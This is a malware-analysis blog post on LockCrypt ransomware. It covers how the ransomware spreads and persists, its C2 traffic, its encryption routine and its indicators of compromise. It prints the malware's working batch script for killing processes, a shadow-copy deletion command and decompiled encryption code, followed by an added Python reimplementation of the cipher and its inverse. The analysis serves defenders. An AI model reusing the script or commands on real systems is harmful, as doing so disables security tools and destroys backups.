This is all about malware analysis, reverse engineering and some cool stuff

Thursday, 30 November 2017

Analysis of LockCrypt ransomware

November 30, 2017 Posted by SDKHERE , No comments

Attackers have recently been breaking into corporate servers via RDP brute-force attacks to spread a new ransomware variant called LockCrypt. The attacks first started in June, but there was an increase in October. Victims were asked to pay 0.5 to 1 BTC to recover their server.
LockCrypt encrypts all files and renames them with a '.lock' extension. It also installs itself for persistence and deletes backups.

Let's have a look at the sample.

MD5 : 12A4388ADE3FAD199631F6A00894104C [VirusTotal] [HybridAnalysis]
Size  : 48128 bytes

When we execute this sample, the following dialogue box appears.

Fig1 : Window after execution of malware

Environment Setup :

On execution, it first copies itself to C:\Windows\bfsvcm.exe.
Then it creates a batch file named w.bat and executes it to kill running processes (everything not on its whitelist); this is for antivirus and sandbox evasion.

You can see the batch script below.

SetLocal EnableDelayedExpansion EnableExtensions
Set WinTitle=%Random%%Random%
Title %WinTitle%
For /F "tokens=2 skip=2 delims=," %%P In ('tasklist /FI "WINDOWTITLE eq %WinTitle%" /FO CSV') Do (Set MyPID=%%~P)
Title %~n0
Set WhiteList=Microsoft.ActiveDirectory.WebServices.exe:cmd.exe:find.exe:conhost.exe:explorer.exe:ctfmon.exe:dllhost.exe:lsass.exe:services.exe:smss.exe:tasklist.exe:winlogon.exe:wmiprvse.exe:msdts.exe:bfsvc.exe:AdapterTroubleshooter.exe:alg.exe:dwm.exe:issch.exe:rundll32.exe:spoolsv.exe:wininit.exe:wmiprvse.exe:wudfhost.exe:taskmgr.exe:rdpclip.exe:logonui.exe:lsm.exe:spoolsv.exe:dwm.exe:dfssvc.exe:csrss.exe:svchost.exe:59F6B4DF10330000_59F6B4E800000000.exe:
REM The For options at the start of the next line are truncated in the extracted copy; only "=5 delims=," survives
For /F "...=5 delims=," %%p In ('tasklist /FO CSV') Do (Echo :!ProcList!|Find /I ":%%~p:">nul||Set ProcList=%%~p:!ProcList!)
:Compare
For /F "tokens=1,* delims=:" %%C In ("!ProcList!") Do (
  If Not "%%C"=="" (
    Echo :!WhiteList!|Find /I ":%%C:">nul||Call :Kill "%%C"
    Set ProcList=%%D
    GoTo Compare
  )
)
:Kill
If "%~1"=="cmd.exe" (
  TaskKill /F /FI "PID ne %MyPID%" /FI "IMAGENAME eq cmd.exe"
) Else (
  TaskKill /F /IM "%~1"
)
del W.bat
Exit /B

After terminating the processes, it calls the DialogBoxParamA Windows API.
It abuses this API to run its malicious routine from the dialog's callback.

You can see the below code.

Fig2 : DialogBoxParamA function call

The dialog box has a callback function, so we will not skip this API.
Let's look into the callback function.
It has multiple cases; the first case manipulates the registry.

First it uses ShellExecute to run the following command, which deletes the volume shadow copies (the backups):
"vssadmin delete shadows /all"
After that it creates a "Hacked" entry under the following registry key.
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Fig3 : Storing victim id in registry

By default the "Hacked" entry is initialized to "SfplHinIptOwnboa".
This is the unique victim id, which is used in the encryption process; the value is regenerated and written back to the registry later.

After that, it modifies the following values under the same registry key.

LegalNoticeCaption = "Attention!!! Your files are encrypted !!!"
LegalNoticeText = "To recover files, follow the prompts in the text file "Readme""
Userinit = "C:\Windows\system32\userinit.exe, C:\Windows\bfsvcm.exe"

This displays the message on the logon screen of the user's system.

Fig4 : Logon screen

You can see the registry of my infected system.

Fig5 : Registry of infected system

Encryption Process :

After the environment setup above, it generates the victim id and stores it in the "Hacked" registry entry mentioned earlier.
The code for generating the unique victim id is:

unsigned int sub_401AC7()
{
  unsigned int v0; // eax@1

  v0 = dword_40C86F;
  if ( !dword_40C86F )
  {
    v0 = GetTickCount();                 // first call: seed the generator with the tick count
    dword_40C86F = v0;
  }
  // one step of the Park-Miller "minimal standard" LCG in Schrage form
  // (16807, 127773 = 0x1F31D and 2836 are its constants); state is kept in dword_40C86F
  dword_40C86F = 16807 * (v0 % 0x1F31D) - 2836 * (v0 / 0x1F31D);
  return dword_40C86F % 0x64u;           // one id component in the range 0..99
}

After creating the id and writing it to the registry, the ransomware sends base64-encoded victim information to the command and control server.

Fig6 : Packet sent to C2 server

The IP address of the server is 46.32.17[.]222 and the information sent to the server has the following format:
Victim_ID | Operating_System | System | Malware_Location

When the server receives this information, it responds with a large block of data.

Fig7 : Server response after getting victim's info

This data is unique to the victim's information and plays the major role in the encryption process.

The encryption algorithm is very simple: it XORs, rotates and byte-swaps the file data using the data received from the server as key material.
You can see the encryption routine used by this ransomware below.

unsigned __int32 __stdcall sub_401865(int a1, unsigned int a2)
{
  int v2; // ecx@1
  int v3; // edx@1
  int v4; // ebx@1
  int v5; // esi@1
  int v6; // edi@1
  unsigned int v7; // ecx@5
  int v8; // edx@5
  int v9; // ebx@5
  int v10; // esi@5
  int v11; // edi@5
  int v12; // eax@6
  unsigned __int32 result; // eax@6

  // pass 1: XOR key DWORDs (key at dword_40D83C, length dword_40D5B0) into the buffer
  // a1 of length a2, advancing only 2 bytes per write so the writes overlap
  v2 = 2 * (a2 >> 2);
  v3 = dword_40D83C;
  v4 = dword_40D5B0 + dword_40D83C;
  v5 = a1;
  v6 = a1;
  do
  {
    *(_DWORD *)v6 = *(_DWORD *)v3 ^ *(_DWORD *)v5;
    v5 += 2;
    v6 += 2;
    v3 += 4;
    if ( v3 == v4 )                      // wrap the key pointer at the end of the key
      v3 = dword_40D83C;
    --v2;                                // loop counter (implied by the bound; missing from the extracted listing)
  }
  while ( v2 );
  // pass 2: per DWORD, rotate left by 5, XOR the next key DWORD, store byte-swapped
  v7 = a2 >> 2;
  v8 = dword_40D83C;
  v9 = dword_40D5B0 + dword_40D83C;
  v10 = a1;
  v11 = a1;
  do
  {
    v12 = *(_DWORD *)v10;
    v10 += 4;
    v12 = __ROL4__(v12, 5);
    result = _byteswap_ulong(*(_DWORD *)v8 ^ v12);
    *(_DWORD *)v11 = result;
    v11 += 4;
    v8 += 4;
    if ( v8 == v9 )                      // wrap the key pointer at the end of the key
      v8 = dword_40D83C;
    --v7;                                // loop counter (implied by the bound; missing from the extracted listing)
  }
  while ( v7 );
  return result;
}

It is very hard to build a decryption tool for this ransomware because the key data changes with the victim id and the server-side algorithm is unknown.
It skips the first 4 bytes and the last 6 bytes of every file and encrypts the rest of the data.
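The two passes of sub_401865 and their inverse, as an added example written here in Python (not code from the post or from the malware): given the key material, which in a real infection is the server response shown in Fig7, the transform is invertible, so a network capture of that response is what file recovery would require. The key bytes and the file are constructed, and the first-4/last-6 byte rule is taken from the post.

```python
import struct

# Constructed sample inputs (not from the post): a stand-in for the server response
# used as key material, and a small file with a 4-byte header and 6-byte trailer.
SAMPLE_KEY = bytes(range(1, 17))
SAMPLE_FILE = b"HDR!" + b"The quick brown fox jumps over the lazy dog." + b"TRAILR"

def _rol5(x):
    return ((x << 5) | (x >> 27)) & 0xFFFFFFFF

def _ror5(x):
    return ((x >> 5) | (x << 27)) & 0xFFFFFFFF

def _key_dword(key, i):
    # the key pointer (dword_40D83C) advances one DWORD per iteration and wraps
    # when it reaches the end of the key (dword_40D5B0 bytes long)
    return struct.unpack_from("<I", key, 4 * (i % (len(key) // 4)))[0]

def _xor_pass(buf, off, length, key):
    # pass 1 of sub_401865: 2*(len/4) XOR writes with a 2-byte stride, so the
    # writes overlap and the last one spills 2 bytes past the region (into the
    # untouched trailer); XOR writes commute, so running this pass again undoes it
    for i in range(2 * (length >> 2)):
        p = off + 2 * i
        v = struct.unpack_from("<I", buf, p)[0] ^ _key_dword(key, i)
        struct.pack_into("<I", buf, p, v)

def encrypt_file_bytes(data, key):
    buf = bytearray(data)
    off, length = 4, len(buf) - 10   # first 4 and last 6 bytes are not passed to the routine
    _xor_pass(buf, off, length, key)
    # pass 2: per DWORD, rotate left 5, XOR the key DWORD, store byte-swapped
    for i in range(length >> 2):
        p = off + 4 * i
        v = struct.unpack_from("<I", buf, p)[0]
        struct.pack_into(">I", buf, p, _rol5(v) ^ _key_dword(key, i))
    return bytes(buf)

def decrypt_file_bytes(data, key):
    buf = bytearray(data)
    off, length = 4, len(buf) - 10
    # undo pass 2: read the byte-swapped DWORD, XOR the same key DWORD, rotate right 5
    for i in range(length >> 2):
        p = off + 4 * i
        v = struct.unpack_from(">I", buf, p)[0] ^ _key_dword(key, i)
        struct.pack_into("<I", buf, p, _ror5(v))
    _xor_pass(buf, off, length, key)   # undo pass 1
    return bytes(buf)
```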

After encryption, each file is renamed in the following format:
File name : [base64 of filename] ID [Victim ID].lock

It drops ReadMe.TxT, the ransom note, in C:\ and creates a Run entry for it so the note is opened on startup:
Microsoft Windows Operating System = "C:\Windows\notepad.exe C:\ReadMe.TxT"

Fig8 : Ransom note (ReadMe.TxT)

IOCs :

Hash  : 1df3d4da1ef11373966f54a6d67c38a223229f272438e1c6ec7cb4c1ea3ff3e2
CnC   : 46.32.17[.]222
Email : enigmax_x@aol[.]com and enigmax_x@bitmessage[.]ch
